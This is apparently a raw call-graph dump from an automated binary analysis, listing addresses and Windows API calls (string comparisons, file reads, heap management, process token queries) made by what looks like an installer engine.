GetLastError 48865->48866 48867 91497a 48865->48867 48866->48868 48870 9129c8 52 API calls 48867->48870 48873 9149e4 48867->48873 48868->48851 48869 913cfd 52 API calls 48869->48868 48871 914986 48870->48871 48871->48868 48872 91499d GetSystemDirectoryW 48871->48872 48872->48873 48874 9149aa GetLastError 48872->48874 48873->48868 48873->48869 48874->48868 48879 912ae3 48875->48879 48878->48856 48882 911ae9 48879->48882 48881 911910 48881->48854 48881->48855 48883 911b02 48882->48883 48884 911b0c 48882->48884 48893 91593a GetProcessHeap HeapSize 48883->48893 48885 911c76 52 API calls 48884->48885 48888 911b12 48884->48888 48890 911b87 48884->48890 48885->48890 48888->48881 48889 911c76 52 API calls 48889->48890 48890->48888 48890->48889 48891 911bfd 48890->48891 48894 9126b9 45 API calls __vsnwprintf_l 48890->48894 48891->48888 48891->48891 48895 91367f GetProcessHeap RtlFreeHeap GetLastError 48891->48895 48893->48884 48894->48890 48895->48888 48896->48570 48897->48572 48898->48573 48899->48576 48900->48579 48901->48580 48902->48582 48904 96b08a 48903->48904 48905 917f80 48904->48905 48907 96a747 FormatMessageW 48904->48907 48905->48587 48908 96a772 GetLastError 48907->48908 48909 96a77e 48907->48909 48908->48909 48910 96a78b 48909->48910 48914 96a805 48909->48914 48912 96a7f5 LocalFree 48910->48912 48913 96a7fe 48910->48913 48912->48913 48913->48905 48915 96a82e EnterCriticalSection 48914->48915 48916 96a9ed 48914->48916 48918 96a935 48915->48918 48919 96a842 GetCurrentProcessId GetCurrentThreadId GetLocalTime 48915->48919 48917 9567e6 _ValidateLocalCookies 5 API calls 48916->48917 48920 96a9fb 48917->48920 48934 91327c 48918->48934 48923 96a87f 48919->48923 48920->48910 48922 96a94f 48931 96a923 48922->48931 48949 96b3f2 EnterCriticalSection 48922->48949 48924 912acf 56 API calls 48923->48924 48926 96a90a 48924->48926 48926->48918 48927 96a914 48926->48927 48927->48931 48928 96a9c6 LeaveCriticalSection 48929 96a9d7 48928->48929 48930 96a9df 48928->48930 48952 91367f GetProcessHeap RtlFreeHeap GetLastError 48929->48952 48930->48916 48953 91367f GetProcessHeap RtlFreeHeap GetLastError 48930->48953 48931->48928 48935 913296 48934->48935 48936 9132a1 48934->48936 48954 913840 GetProcessHeap HeapSize 48935->48954 48937 9132ce WideCharToMultiByte 48936->48937 48940 9132a7 48936->48940 48942 913333 48936->48942 48939 9132e7 GetLastError 48937->48939 48937->48942 48939->48940 48940->48922 48941 913387 48941->48940 48943 9133d4 WideCharToMultiByte 48941->48943 48942->48940 48942->48941 48944 913380 48942->48944 48945 913389 48942->48945 48943->48940 48946 9133f0 GetLastError 48943->48946 48955 9156c2 GetProcessHeap RtlReAllocateHeap 48944->48955 48956 91540b GetProcessHeap RtlAllocateHeap 48945->48956 48946->48940 48957 96aabf 48949->48957 48951 96b40b LeaveCriticalSection 48951->48931 48952->48930 48953->48916 48954->48936 48955->48941 48956->48941 48958 96aae2 48957->48958 48959 96ab1e 48958->48959 48962 96ab4b 48958->48962 48964 96aae8 48958->48964 48965 913145 6 API calls 48959->48965 48960 96ab50 WriteFile 48960->48962 48963 96ab6b GetLastError 48960->48963 48962->48960 48962->48964 48963->48962 48964->48951 48965->48964 48978 969a4d 48966->48978 48968 96a069 48968->48594 48969->48597 48970->48602 48972 91176a 48971->48972 48974 911763 48971->48974 48973 911795 GetLastError 48972->48973 48972->48974 48973->48974 48974->48604 48976 9155e4 GetLastError 48975->48976 48977 9155f0 48975->48977 48976->48977 48977->48599 48979 969ad0 48978->48979 48980 969a69 48978->48980 48988 91540b GetProcessHeap RtlAllocateHeap 48979->48988 48986 91593a GetProcessHeap HeapSize 48980->48986 48983 969a74 48985 969a7a 48983->48985 48987 9156c2 GetProcessHeap RtlReAllocateHeap 48983->48987 48985->48968 48986->48983 48987->48985 48988->48985 48990 92ba05 48989->48990 48991 92b9f9 CloseHandle 48989->48991 48992 92ba16 48990->48992 48993 92ba0a CloseHandle 48990->48993 48991->48990 48994 92ba27 48992->48994 48995 92ba1b CloseHandle 48992->48995 48993->48992 48996 92ba3a 48994->48996 48997 92ba2d CloseHandle 48994->48997 48995->48994 48998 92ba48 48996->48998 49175 91367f GetProcessHeap RtlFreeHeap GetLastError 48996->49175 48997->48996 49000 92ba54 48998->49000 49176 91367f GetProcessHeap RtlFreeHeap GetLastError 48998->49176 49000->48629 49003 91783d DeleteCriticalSection 49002->49003 49006 920598 49002->49006 49008 925739 49003->49008 49004 9205bf 49005 9155c9 3 API calls 49004->49005 49005->49003 49006->49004 49177 91367f GetProcessHeap RtlFreeHeap GetLastError 49006->49177 49009 925746 49008->49009 49010 92574e 49008->49010 49178 91367f GetProcessHeap RtlFreeHeap GetLastError 49009->49178 49012 92003c 3 API calls 49010->49012 49013 925754 _memcpy_s 49012->49013 49013->48639 49015 917862 49014->49015 49016 91e965 49014->49016 49020 931a5b 49015->49020 49018 91367f GetProcessHeap RtlFreeHeap GetLastError 49016->49018 49019 91e9ab 49016->49019 49017 9155c9 3 API calls 49017->49015 49018->49016 49019->49017 49021 91786e 49020->49021 49022 931a67 49020->49022 49024 926e65 49021->49024 49179 97542a GetProcessHeap RtlFreeHeap GetLastError 49022->49179 49180 925d86 49024->49180 49027 926e83 _memcpy_s 49027->48645 49030 917886 49029->49030 49033 91c086 49029->49033 49036 9227a8 49030->49036 49031 91c0bc 49032 9155c9 3 API calls 49031->49032 49032->49030 49033->49031 49255 91367f GetProcessHeap RtlFreeHeap GetLastError 49033->49255 49256 93dcae GetProcessHeap RtlFreeHeap GetLastError GetProcessHeap HeapSize 49033->49256 49037 917892 49036->49037 49039 9227bb 49036->49039 49042 929cf3 49037->49042 49038 9155c9 3 API calls 49038->49037 49040 922877 49039->49040 49041 91367f GetProcessHeap RtlFreeHeap GetLastError 49039->49041 49040->49038 49041->49039 49043 929d02 49042->49043 49044 929d0a 49042->49044 49267 91367f GetProcessHeap RtlFreeHeap GetLastError 49043->49267 49046 929d18 49044->49046 49268 91367f GetProcessHeap RtlFreeHeap GetLastError 49044->49268 49048 929d37 49046->49048 49269 91367f GetProcessHeap RtlFreeHeap GetLastError 49046->49269 49049 929d44 49048->49049 49051 9155c9 3 API calls 49048->49051 49052 929d61 49049->49052 49270 91367f GetProcessHeap RtlFreeHeap GetLastError 49049->49270 49051->49049 49053 929d6e 49052->49053 49055 9155c9 3 API calls 49052->49055 49056 929d8b 49053->49056 49271 91367f GetProcessHeap RtlFreeHeap GetLastError 49053->49271 49055->49053 49057 929d98 49056->49057 49059 9155c9 3 API calls 49056->49059 49060 929db5 49057->49060 49272 91367f GetProcessHeap RtlFreeHeap GetLastError 49057->49272 49059->49057 49061 929dc2 49060->49061 49063 9155c9 3 API calls 49060->49063 49064 929dcf 49061->49064 49273 91367f GetProcessHeap RtlFreeHeap GetLastError 49061->49273 49063->49061 49066 929ddc 49064->49066 49274 91367f GetProcessHeap RtlFreeHeap GetLastError 49064->49274 49068 929de9 49066->49068 49275 91367f GetProcessHeap RtlFreeHeap GetLastError 49066->49275 49070 929df6 49068->49070 49276 91367f GetProcessHeap RtlFreeHeap GetLastError 49068->49276 49072 929e03 49070->49072 49277 91367f GetProcessHeap RtlFreeHeap GetLastError 49070->49277 49074 929e10 49072->49074 49278 91367f GetProcessHeap RtlFreeHeap GetLastError 49072->49278 49076 929e1d 49074->49076 49279 91367f GetProcessHeap RtlFreeHeap GetLastError 49074->49279 49078 929e2a 49076->49078 49280 91367f GetProcessHeap RtlFreeHeap GetLastError 49076->49280 49080 929e37 49078->49080 49281 91367f GetProcessHeap RtlFreeHeap GetLastError 49078->49281 49081 929e44 49080->49081 49282 91367f GetProcessHeap RtlFreeHeap GetLastError 49080->49282 49084 929e51 49081->49084 49283 91367f GetProcessHeap RtlFreeHeap GetLastError 49081->49283 49086 929e5e 49084->49086 49284 91367f GetProcessHeap RtlFreeHeap GetLastError 49084->49284 49088 929e6b 49086->49088 49285 91367f GetProcessHeap RtlFreeHeap GetLastError 49086->49285 49090 929e78 49088->49090 49286 91367f GetProcessHeap RtlFreeHeap GetLastError 49088->49286 49091 929e85 49090->49091 49287 91367f GetProcessHeap RtlFreeHeap GetLastError 49090->49287 49094 929e95 49091->49094 49288 91367f GetProcessHeap RtlFreeHeap GetLastError 49091->49288 49096 929ea5 49094->49096 49289 91367f GetProcessHeap RtlFreeHeap GetLastError 49094->49289 49098 929eb5 49096->49098 49290 91367f GetProcessHeap RtlFreeHeap GetLastError 49096->49290 49100 929ec5 49098->49100 49291 91367f GetProcessHeap RtlFreeHeap GetLastError 49098->49291 49102 929ed5 49100->49102 49292 91367f GetProcessHeap RtlFreeHeap GetLastError 49100->49292 49104 929ee5 49102->49104 49293 91367f GetProcessHeap RtlFreeHeap GetLastError 49102->49293 49116 929ef5 49104->49116 49294 91367f GetProcessHeap RtlFreeHeap GetLastError 49104->49294 49107 929f76 49108 929f88 49107->49108 49295 91367f GetProcessHeap RtlFreeHeap GetLastError 49107->49295 49111 929f98 49108->49111 49296 91367f GetProcessHeap RtlFreeHeap GetLastError 49108->49296 49109 929f6e 49112 9155c9 3 API calls 49109->49112 49257 94022a 49111->49257 49112->49107 49116->49107 49116->49109 49118 91367f GetProcessHeap RtlFreeHeap GetLastError 49116->49118 49117 929fba _memcpy_s 49117->48651 49118->49116 49121 920070 49120->49121 49122 920049 49120->49122 49123 9178aa 49121->49123 49301 974b0d GetProcessHeap RtlFreeHeap GetLastError 49121->49301 49127 920067 49122->49127 49300 91f6ce GetProcessHeap RtlFreeHeap GetLastError 49122->49300 49128 926ce3 49123->49128 49124 9155c9 3 API calls 49124->49121 49127->49124 49134 926d4d 49128->49134 49145 926cf5 49128->49145 49129 926d45 49131 9155c9 3 API calls 49129->49131 49130 926dab 49135 926db9 49130->49135 49140 9155c9 3 API calls 49130->49140 49131->49134 49132 926d72 49136 9155c9 3 API calls 49132->49136 49133 926da3 49138 9155c9 3 API calls 49133->49138 49134->49132 49137 926d7d 49134->49137 49139 925d86 3 API calls 49134->49139 49141 9178b6 49135->49141 49143 9155c9 3 API calls 49135->49143 49136->49137 49137->49130 49137->49133 49302 91367f GetProcessHeap RtlFreeHeap GetLastError 49137->49302 49138->49130 49139->49134 49140->49135 49146 91e406 49141->49146 49142 91367f GetProcessHeap RtlFreeHeap GetLastError 49142->49145 49143->49141 49145->49129 49145->49142 49147 91e413 49146->49147 49148 91e41b _memcpy_s 49146->49148 49149 9155c9 3 API calls 49147->49149 49148->48657 49149->49148 49151 9178cb 49150->49151 49153 91f404 49150->49153 49151->48660 49160 91367f GetProcessHeap RtlFreeHeap GetLastError 49151->49160 49152 9155c9 3 API calls 49152->49151 49154 91367f GetProcessHeap RtlFreeHeap GetLastError 49153->49154 49155 9155c9 3 API calls 49153->49155 49156 91f4c5 49153->49156 49303 974b0d GetProcessHeap RtlFreeHeap GetLastError 49153->49303 49154->49153 49155->49153 49156->49152 49158->48613 49159->48632 49160->48660 49161->48662 49162->48664 49163->48666 49164->48669 49165->48670 49166->48672 49167->48674 49168->48676 49169->48678 49170->48680 49171->48682 49172->48684 49173->48686 49174->48688 49175->48998 49176->49000 49177->49006 49178->49010 49179->49021 49181 925d92 49180->49181 49182 925d99 49180->49182 49235 91367f GetProcessHeap RtlFreeHeap GetLastError 49181->49235 49183 925da7 49182->49183 49236 91367f GetProcessHeap RtlFreeHeap GetLastError 49182->49236 49186 925db5 49183->49186 49237 91367f GetProcessHeap RtlFreeHeap GetLastError 49183->49237 49188 925dc3 49186->49188 49238 91367f GetProcessHeap RtlFreeHeap GetLastError 49186->49238 49190 925dd1 49188->49190 49239 91367f GetProcessHeap RtlFreeHeap GetLastError 49188->49239 49192 925ddf 49190->49192 49240 91367f GetProcessHeap RtlFreeHeap GetLastError 49190->49240 49194 925ded 49192->49194 49241 91367f GetProcessHeap RtlFreeHeap GetLastError 49192->49241 49205 925e2c 49194->49205 49213 925e1f 49194->49213 49242 931a7d GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49194->49242 49196 925e3d 49199 925e48 49196->49199 49200 925e7c 49196->49200 49197 9155c9 3 API calls 49197->49205 49198 9155c9 3 API calls 49198->49196 49201 925e74 49199->49201 49202 925e4d 49199->49202 49247 941292 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49200->49247 49246 9430b4 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49201->49246 49206 925e52 49202->49206 49207 925e6c 49202->49207 49205->49196 49205->49198 49210 925e57 49206->49210 49211 925e64 49206->49211 49245 946705 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49207->49245 49208 925e62 49219 925e93 49208->49219 49210->49208 49243 949e34 GetProcessHeap RtlFreeHeap GetLastError 49210->49243 49244 9491ab GetProcessHeap RtlFreeHeap GetLastError 49211->49244 49213->49197 49215 925e8e 49215->49027 49218 91367f GetProcessHeap RtlFreeHeap GetLastError 49215->49218 49218->49027 49220 925ea0 49219->49220 49221 925ea8 49219->49221 49248 91367f GetProcessHeap RtlFreeHeap GetLastError 49220->49248 49225 925eb6 49221->49225 49249 91367f GetProcessHeap RtlFreeHeap GetLastError 49221->49249 49224 925ec4 49226 925ed2 49224->49226 49251 91367f GetProcessHeap RtlFreeHeap GetLastError 49224->49251 49225->49224 49250 91367f GetProcessHeap RtlFreeHeap GetLastError 49225->49250 49229 925ee0 49226->49229 49252 91367f GetProcessHeap RtlFreeHeap GetLastError 49226->49252 49231 925f02 _memcpy_s 49229->49231 49232 925ef4 49229->49232 49253 91367f GetProcessHeap RtlFreeHeap GetLastError 49229->49253 49231->49215 49232->49231 49254 9715b5 GetProcessHeap RtlFreeHeap GetLastError 49232->49254 49235->49182 49236->49183 49237->49186 49238->49188 49239->49190 49240->49192 49241->49194 49242->49194 49243->49208 49244->49208 49245->49208 49246->49208 49247->49208 49248->49221 49249->49225 49250->49224 49251->49226 49252->49229 49253->49232 49254->49231 49255->49033 49256->49033 49258 9402c8 49257->49258 49265 94023e 49257->49265 49259 929fa4 49258->49259 49261 9155c9 3 API calls 49258->49261 49259->49117 49297 97542a GetProcessHeap RtlFreeHeap GetLastError 49259->49297 49260 9402bf 49262 9155c9 3 API calls 49260->49262 49261->49259 49262->49258 49263 925d86 3 API calls 49263->49265 49265->49260 49265->49263 49298 91f6ce GetProcessHeap RtlFreeHeap GetLastError 49265->49298 49299 91367f GetProcessHeap RtlFreeHeap GetLastError 49265->49299 49267->49044 49268->49046 49269->49046 49270->49049 49271->49053 49272->49057 49273->49064 49274->49066 49275->49068 49276->49070 49277->49072 49278->49074 49279->49076 49280->49078 49281->49080 49282->49081 49283->49084 49284->49086 49285->49088 49286->49090 49287->49091 49288->49094 49289->49096 49290->49098 49291->49100 49292->49102 49293->49104 49294->49116 49295->49108 49296->49111 49297->49117 49298->49265 49299->49265 49300->49122 49301->49123 49302->49137 49303->49153 49305 96ac62 49304->49305 49306 96ac3f 49304->49306 49308 96ac71 49305->49308 49318 91367f GetProcessHeap RtlFreeHeap GetLastError 49305->49318 49307 96ac4a 49306->49307 49317 96aed3 76 API calls 49306->49317 49307->49305 49310 96ac54 CloseHandle 49307->49310 49312 96ac87 49308->49312 49319 91367f GetProcessHeap RtlFreeHeap GetLastError 49308->49319 49310->49305 49312->48694 49312->48695 49314->48696 49315->48698 49316->48700 49317->49307 49318->49308 49319->49312 49320->48716 50762 953582 SetThreadExecutionState 50763 97ad80 CompareStringOrdinal GetLastError 50764 95e18d 44 API calls ___free_lconv_mon 49604 97058b 49605 970599 CoInitialize 49604->49605 49607 9705ab 49604->49607 49605->49607 49606 9705df CLSIDFromProgID 49608 9705f4 CLSIDFromProgID 49606->49608 49609 9705af 49606->49609 49607->49606 49607->49609 49608->49609 49610 96a58b 49611 911839 68 API calls 49610->49611 49612 96a59c 49611->49612 49613 96a5a2 GetProcAddress GetProcAddress 49612->49613 49614 96a5d0 49612->49614 49613->49614 49615 96a5fb 49614->49615 49616 911839 68 API calls 49614->49616 49617 96a5f5 49616->49617 49617->49615 49618 96a619 GetProcAddress 49617->49618 49619 96a677 GetProcAddress 49618->49619 49620 96a638 49618->49620 49619->49615 49621 96a696 49619->49621 49620->49619 49622 96a63c GetLastError 49620->49622 49621->49615 49623 96a69a GetLastError 49621->49623 49624 96a648 49622->49624 49623->49624 49624->49615 50766 9165b0 66 API calls 50768 97c1b1 16 API calls ___delayLoadHelper2@8 50175 96f5a7 50176 9118c0 62 API calls 50175->50176 50177 96f5c3 50176->50177 50182 96f5c9 50177->50182 50200 973be0 50177->50200 50179 96f5fc GetProcAddress 50180 96f620 GetProcAddress 50179->50180 50181 96f61b 50179->50181 50183 96f644 GetProcAddress 50180->50183 50184 96f63f 50180->50184 50181->50180 50185 96f74e 50182->50185 50212 91367f GetProcessHeap RtlFreeHeap GetLastError 50182->50212 50186 96f663 50183->50186 50187 96f668 GetProcAddress 50183->50187 50184->50183 50186->50187 50189 96f687 50187->50189 50190 96f68c GetProcAddress 50187->50190 50189->50190 50191 96f6b0 GetProcAddress 50190->50191 50192 96f6ab 50190->50192 50193 96f6d4 GetProcAddress 50191->50193 50194 96f6cf 50191->50194 50192->50191 50195 96f6f3 50193->50195 50194->50193 50196 96f717 50195->50196 50197 96f701 GetProcAddress 50195->50197 50198 96f736 50196->50198 50199 96f720 GetProcAddress 50196->50199 50197->50196 50198->50182 50199->50198 50201 973c03 50200->50201 50202 973c51 GlobalAlloc 50201->50202 50203 973c09 GetLastError 50201->50203 50205 973c89 50202->50205 50208 973c22 50202->50208 50204 973c15 50203->50204 50204->50202 50204->50208 50206 973ca4 50205->50206 50207 973c98 GetLastError 50205->50207 50209 973cf6 GetLastError 50206->50209 50211 973cb1 50206->50211 50207->50206 50208->50179 50209->50211 50210 973d45 GlobalFree 50210->50208 50211->50210 50212->50185 50773 9197a0 67 API calls 50774 93fba1 CompareStringW CompareStringOrdinal GetLastError 50775 9361a0 58 API calls 50776 9605a0 15 API calls 2 library calls 48374 93ddd0 48375 93ddf4 48374->48375 48376 93de12 48375->48376 48377 93de09 CloseHandle 48375->48377 48377->48376 50781 93e1d0 43 API calls _memcpy_s 50783 95a7da 54 API calls 3 library calls 50785 918dc0 6 API calls 48508 93ddc0 48511 91540b GetProcessHeap RtlAllocateHeap 48508->48511 48510 93ddcd 48511->48510 50788 939dc0 365 API calls 50790 929bc6 82 API calls 50791 9115c8 73 API calls 50794 9527c9 143 API calls 50795 9191f0 56 API calls 50796 919df0 79 API calls 49719 93dff0 49724 93eb41 49719->49724 49721 93e01f ReadFile 49722 93e037 GetLastError 49721->49722 49723 93e043 49721->49723 49722->49723 49725 93eb56 49724->49725 49726 93eb5c SetFilePointerEx 49725->49726 49728 93eb7f 49725->49728 49727 93eb73 GetLastError 49726->49727 49726->49728 49727->49728 49728->49721 50797 9171f5 80 API calls 50799 9569f3 14 API calls 50801 9319f9 78 API calls 50802 93f9e3 77 API calls 50803 9169e0 10 API calls 50804 9199e0 70 API calls 50805 9535e3 GetProcessHeap RtlFreeHeap GetLastError 50806 970fe0 74 API calls 50808 916be8 9 API calls 50809 95a1e8 52 API calls 4 library calls 48482 917b1f 192 API calls _ValidateLocalCookies 50813 91711f 378 API calls 50814 961503 44 API calls 2 library calls 50818 93fb05 65 API calls 50819 918f30 54 API calls _ValidateLocalCookies 50820 953337 277 API calls 50821 93f530 131 API calls 49730 97c331 49731 97c33b 49730->49731 49732 97c6ef ___delayLoadHelper2@8 16 API calls 49731->49732 49733 97c348 49732->49733 50824 95a13b 41 API calls 4 library calls 50154 911121 CreateFileW 50165 9179d1 50154->50165 50158 91114d 50159 911190 CloseHandle 50158->50159 50160 911197 50158->50160 50159->50160 50162 9111a5 50160->50162 50171 91367f GetProcessHeap RtlFreeHeap GetLastError 50160->50171 50163 9567e6 _ValidateLocalCookies 5 API calls 50162->50163 50164 9111bb 50163->50164 50166 9179e7 lstrlenW 50165->50166 50167 9179fc 50165->50167 50166->50167 50168 911144 50167->50168 50169 917a15 CompareStringW 50167->50169 50170 911651 HeapSetInformation 50168->50170 50169->50168 50170->50158 50171->50162 50825 919720 17 API calls 50826 93d520 98 API calls 50827 932d27 81 API calls 50828 966320 51 API calls 50829 916750 72 API calls 50830 957150 51 API calls _unexpected 50831 959350 6 API calls 4 library calls 50833 962f50 FreeLibrary 50835 9290f5 9 API calls _ValidateLocalCookies 50837 916570 73 API calls 50838 918d70 6 API calls 50839 93f971 76 API calls 50841 93f170 117 API calls 49737 91677f InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 49738 9167e5 49737->49738 49739 9167f1 GetCurrentProcess 49738->49739 49748 96b796 OpenProcessToken 49739->49748 49743 91681e 49746 916824 49743->49746 49821 91db61 49743->49821 49749 96b7be GetLastError 49748->49749 49750 96b7f8 GetTokenInformation 49748->49750 49752 96b7ca 49749->49752 49751 96b820 GetLastError 49750->49751 49750->49752 49751->49752 49753 96b873 CloseHandle 49752->49753 49754 916804 49752->49754 49753->49754 49755 93469c 49754->49755 49789 934910 49755->49789 49808 9346d7 49755->49808 49756 9346fb CompareStringW 49757 93572b CompareStringW 49756->49757 49758 93471b CompareStringW 49756->49758 49757->49808 49758->49757 49760 93473e CompareStringW 49758->49760 49759 915573 6 API calls 49759->49808 49760->49757 49761 934761 CompareStringW 49760->49761 49762 934784 CompareStringW 49761->49762 49761->49808 49763 9347a7 CompareStringW 49762->49763 49762->49808 49764 9347ca CompareStringW 49763->49764 49763->49808 49765 9347ed CompareStringW 49764->49765 49764->49808 49766 934810 CompareStringW 49765->49766 49765->49808 49767 934833 CompareStringW 49766->49767 49766->49808 49768 934856 CompareStringW 49767->49768 49767->49808 49769 934884 CompareStringW 49768->49769 49768->49808 49770 93495d CompareStringW 49769->49770 49769->49808 49771 93499a CompareStringW 49770->49771 49770->49808 49772 9349d8 CompareStringW 49771->49772 49771->49808 49773 934a16 CompareStringW 49772->49773 49772->49808 49774 934a54 CompareStringW 49773->49774 49773->49808 49775 934a77 CompareStringW 49774->49775 49774->49808 49777 934a9a CompareStringW 49775->49777 49775->49808 49776 91417b 60 API calls 49776->49808 49778 934ac5 CompareStringW 49777->49778 49777->49808 49779 934afb CompareStringW 49778->49779 49778->49808 49780 934b28 CompareStringW 49779->49780 49779->49808 49781 934b89 CompareStringW 49780->49781 49780->49808 49782 934bea CompareStringW 49781->49782 49781->49808 49783 934c3d CompareStringW 49782->49783 49782->49808 49784 934c90 lstrlenW CompareStringW 49783->49784 49783->49808 49785 934cba lstrlenW 49784->49785 49786 934d58 CompareStringW 49784->49786 49785->49808 49787 934e56 lstrlenW lstrlenW CompareStringW 49786->49787 49786->49808 49788 934f7a lstrlenW lstrlenW CompareStringW 49787->49788 49787->49808 49790 935010 CompareStringW 49788->49790 49791 934faa lstrlenW 49788->49791 49789->49743 49792 9350a6 CompareStringW 49790->49792 49790->49808 49791->49808 49793 9350e9 CompareStringW 49792->49793 49792->49808 49795 93510a CompareStringW 49793->49795 49793->49808 49794 934ef6 lstrlenW 49794->49808 49796 93512d CompareStringW 49795->49796 49795->49808 49798 935150 CompareStringW 49796->49798 49796->49808 49797 9329f3 52 API calls 49797->49808 49799 935173 CompareStringW 49798->49799 49798->49808 49801 935196 CompareStringW 49799->49801 49799->49808 49800 918119 72 API calls 49800->49808 49802 9351bc CompareStringW 49801->49802 49801->49808 49803 9351e2 CompareStringW 49802->49803 49802->49808 49804 935210 CompareStringW 49803->49804 49803->49808 49805 93527b lstrlenW lstrlenW CompareStringW 49804->49805 49804->49808 49806 935320 lstrlenW lstrlenW CompareStringW 49805->49806 49807 9352ab lstrlenW 49805->49807 49809 935350 lstrlenW 49806->49809 49810 9353c8 lstrlenW lstrlenW CompareStringW 49806->49810 49807->49808 49808->49756 49808->49757 49808->49759 49808->49776 49808->49789 49808->49793 49808->49794 49808->49797 49808->49800 49808->49804 49808->49806 49808->49810 49817 912eaf 52 API calls 49808->49817 49819 93567a lstrlenW lstrlenW CompareStringW 49808->49819 49809->49808 49811 935463 lstrlenW lstrlenW CompareStringW 49810->49811 49812 9353f8 lstrlenW 49810->49812 49813 935522 lstrlenW lstrlenW CompareStringW 49811->49813 49814 935497 lstrlenW 49811->49814 49812->49808 49815 935552 lstrlenW 49813->49815 49816 9355cb lstrlenW lstrlenW CompareStringW 49813->49816 49820 9354b7 49814->49820 49815->49820 49818 9355fb lstrlenW 49816->49818 49816->49819 49817->49808 49818->49808 49819->49808 49820->49813 49820->49816 49822 91db9a _memcpy_s 49821->49822 49823 91dc18 SetFilePointerEx 49822->49823 49824 91dbd8 GetLastError 49822->49824 49826 91dc74 ReadFile 49823->49826 49827 91dc34 GetLastError 49823->49827 49852 91dbe4 49824->49852 49828 91dcce 49826->49828 49829 91dc8e GetLastError 49826->49829 49827->49852 49830 91dcea SetFilePointerEx 49828->49830 49828->49852 49829->49852 49831 91dd3e ReadFile 49830->49831 49832 91dcfe GetLastError 49830->49832 49833 91dd9b 49831->49833 49834 91dd5b GetLastError 49831->49834 49832->49852 49835 91ddb8 SetFilePointerEx 49833->49835 49833->49852 49834->49852 49837 91de1f ReadFile 49835->49837 49838 91dddf GetLastError 49835->49838 49836 9567e6 _ValidateLocalCookies 5 API calls 49839 916847 49836->49839 49840 91de7c ReadFile 49837->49840 49841 91de3c GetLastError 49837->49841 49838->49852 49839->49746 49866 92f511 49839->49866 49842 91ded9 SetFilePointerEx 49840->49842 49843 91de99 GetLastError 49840->49843 49841->49852 49844 91df38 ReadFile 49842->49844 49845 91def8 GetLastError 49842->49845 49843->49852 49846 91dfbc GetLastError 49844->49846 49847 91df5c 49844->49847 49845->49852 49846->49852 49848 91e00e 49847->49848 49849 91df96 ReadFile 49847->49849 49847->49852 49858 91e0b2 49847->49858 49848->49852 49894 91540b GetProcessHeap RtlAllocateHeap 49848->49894 49849->49846 49849->49847 49851 91e054 49851->49852 49853 91e08f SetFilePointerEx 49851->49853 49852->49836 49854 91e0a6 GetLastError 49853->49854 49855 91e0ef ReadFile 49853->49855 49854->49858 49856 91e114 GetLastError 49855->49856 49860 91e14b 49855->49860 49857 91e120 49856->49857 49857->49858 49858->49852 49859 9155c9 3 API calls 49858->49859 49859->49852 49860->49857 49895 973b63 GetFileSizeEx GetLastError 49860->49895 49862 91e202 49896 91540b GetProcessHeap RtlAllocateHeap 49862->49896 49864 91e2aa _memcpy_s 49897 91d84a GetModuleHandleW GetLastError 49864->49897 49898 97267a 49866->49898 49869 913db5 52 API calls 49870 92f56f 49869->49870 49871 913cfd 52 API calls 49870->49871 49872 92f530 49870->49872 49874 92f597 49871->49874 49873 92f74b 49872->49873 49947 91367f GetProcessHeap RtlFreeHeap GetLastError 49872->49947 49873->49746 49874->49872 49908 97672f 49874->49908 49877 92f5ce 49877->49872 49878 92f636 49877->49878 49881 92f61b 49877->49881 49882 92f5fb 49877->49882 49879 912eaf 52 API calls 49878->49879 49880 92f601 49879->49880 49880->49872 49920 971ec9 49880->49920 49881->49878 49946 96acf6 72 API calls _ValidateLocalCookies 49881->49946 49884 913cfd 52 API calls 49882->49884 49884->49880 49887 97267a 72 API calls 49888 92f6a9 49887->49888 49888->49872 49889 913db5 52 API calls 49888->49889 49890 92f6d9 49889->49890 49890->49872 49891 913cfd 52 API calls 49890->49891 49892 92f6fe 49891->49892 49892->49872 49933 92cb06 49892->49933 49894->49851 49895->49862 49896->49864 49897->49857 49899 9726b2 49898->49899 49907 97285b 49898->49907 49899->49907 49948 9729ea 49899->49948 49901 97289f 49903 9567e6 _ValidateLocalCookies 5 API calls 49901->49903 49906 92f52a 49903->49906 49906->49869 49906->49872 49907->49901 49962 91367f GetProcessHeap RtlFreeHeap GetLastError 49907->49962 49963 9765ae 49908->49963 49911 976774 49913 9767fe 49911->49913 49914 9767ed 49911->49914 49916 9767f9 49911->49916 49917 912eaf 52 API calls 49913->49917 49914->49916 49973 91367f GetProcessHeap RtlFreeHeap GetLastError 49914->49973 49915 9767d6 RegCloseKey 49915->49911 49916->49877 49917->49916 49919 976751 49919->49911 49919->49915 49921 971ee2 49920->49921 49929 971f01 49920->49929 49921->49929 49982 971cac 49921->49982 49924 971cac 73 API calls 49925 971f26 49924->49925 49926 971f3c CompareStringW 49925->49926 49925->49929 49927 971f53 GetLastError 49926->49927 49926->49929 49927->49929 49928 971fd2 49931 92f669 49928->49931 50001 91367f GetProcessHeap RtlFreeHeap GetLastError 49928->50001 49929->49928 50000 91367f GetProcessHeap RtlFreeHeap GetLastError 49929->50000 49931->49872 49931->49887 49934 914dd8 70 API calls 49933->49934 49935 92cb1a 49934->49935 49936 913cfd 52 API calls 49935->49936 49941 92cb20 49935->49941 49937 92cb4d 49936->49937 49937->49941 50008 92c930 49937->50008 49940 92cc14 49940->49872 49941->49940 50035 91367f GetProcessHeap RtlFreeHeap GetLastError 49941->50035 49946->49878 49947->49873 49949 911839 68 API calls 49948->49949 49950 972a07 49949->49950 49951 972a40 GetProcAddress 49950->49951 49952 972a11 49950->49952 49951->49952 49957 972a86 49951->49957 49953 972b17 49952->49953 49954 972b0e CoTaskMemFree 49952->49954 49955 97284a 49953->49955 49956 972b1d FreeLibrary 49953->49956 49954->49953 49955->49901 49955->49907 49961 9724d0 53 API calls _ValidateLocalCookies 49955->49961 49956->49955 49957->49952 49958 912eaf 52 API calls 49957->49958 49959 972ac4 49958->49959 49959->49952 49960 913cfd 52 API calls 49959->49960 49960->49952 49961->49907 49962->49901 49964 913db5 52 API calls 49963->49964 49965 9765c8 49964->49965 49967 9765ce 49965->49967 49974 96cba8 49965->49974 49968 976666 49967->49968 49977 91367f GetProcessHeap RtlFreeHeap GetLastError 49967->49977 49968->49911 49968->49919 49972 96cd94 58 API calls 49968->49972 49971 97664c RegCloseKey 49971->49967 49972->49919 49973->49916 49978 96cbc2 49974->49978 49976 96cbbe 